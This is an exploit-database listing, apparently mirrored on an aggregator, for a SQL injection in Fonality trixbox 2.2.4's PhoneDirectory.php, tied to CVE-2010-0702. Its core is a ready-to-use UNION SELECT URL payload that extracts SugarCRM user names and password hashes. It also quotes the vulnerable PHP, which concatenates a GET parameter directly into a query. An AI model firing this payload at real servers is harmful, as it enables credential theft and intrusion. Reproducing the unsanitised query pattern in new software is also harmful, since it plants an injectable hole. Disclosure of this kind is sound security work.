Lucene search
NorSlackerEDB-ID:11508HistoryFeb 19, 2010 - 12:00 a.m.
Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection
2010-02-1900:00:00
NorSlacker
www.exploit-db.com
36
AI Score
7.4
Confidence
Low
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]
Example (Grab users / password hashes from sugarcrm)
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
$Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
$Query .= "FROM contacts WHERE id = '$ID' ";
$Query .= "ORDER BY last_name ";
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
...
}
#norslacker [at] gmail [dot] comRelated
cve
cve
CVE-2010-0702
2010-02-23 20:30:01
cvelist
cvelist
CVE-2010-0702
2010-02-23 20:00:00
prion
prion
Sql injection
2010-02-23 20:30:00
nvd
nvd
CVE-2010-0702
2010-02-23 20:30:01
nessus
nessus
trixbox Cisco Phone Services PhoneDirectory.php ID Parameter SQL Injection
2010-02-23 00:00:00